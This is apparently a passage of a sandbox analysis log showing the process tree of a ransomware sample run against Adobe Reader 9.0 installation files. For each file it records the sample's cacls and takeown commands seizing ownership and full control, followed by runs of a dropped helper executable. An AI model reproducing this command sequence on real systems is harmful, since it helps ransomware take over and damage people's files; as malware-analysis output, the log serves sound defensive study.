C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:3836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:3832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵
- Modifies file permissions
PID:2120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "form_responses.gif" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "form_responses.gif" -nobanner4⤵PID:2180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:2824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:3040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:3076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "review_email.gif" -nobanner3⤵PID:1316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "review_email.gif" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:3096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:2388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:2152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "tr.gif" -nobanner3⤵PID:2328
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "tr.gif" -nobanner4⤵PID:2260
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:3152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:2520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:3712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:1092
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:3132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:3136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:2676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:3220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:1872
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:2612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:3080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:2740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:2708
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:3268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:3092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "can.fca" -nobanner3⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "can.fca" -nobanner4⤵PID:2964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:3352
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "usa03.ths" -nobanner3⤵PID:2936
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "usa03.ths" -nobanner4⤵PID:3240
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:2160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:2808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:3428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:1364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵PID:3972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:2920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:3456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:1536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "pmd.cer" -nobanner3⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "pmd.cer" -nobanner4⤵PID:1504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:2056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:3356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:2564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "pdf.gif" -nobanner3⤵PID:1852
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "pdf.gif" -nobanner4⤵PID:1508
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:2764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:2072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "server_issue.gif" -nobanner3⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "server_issue.gif" -nobanner4⤵PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:2064
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:2632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:3652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:2572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:3900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:2552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:2596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:4064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:2308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "zx______.pfm" -nobanner3⤵PID:2304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "zx______.pfm" -nobanner4⤵PID:3684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:3172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:2476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵
- Modifies file permissions
PID:2820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:3704
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:4060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "can32.clx" -nobanner3⤵PID:3968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "can32.clx" -nobanner4⤵PID:3940
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:3744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:3724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:3764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "symbol.txt" -nobanner3⤵PID:3844
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "symbol.txt" -nobanner4⤵PID:704
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:3756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:3864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:3668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:1992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:3988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:2836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:2880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:3832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:3872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:4056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:3860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵
- Modifies file permissions
PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "main.css" -nobanner3⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "main.css" -nobanner4⤵PID:3040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:1316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:2824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:2192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "review_shared.gif" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "review_shared.gif" -nobanner4⤵PID:2672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:3180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:2492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:2520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:2696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:3192
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:3188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2768
-
-
-
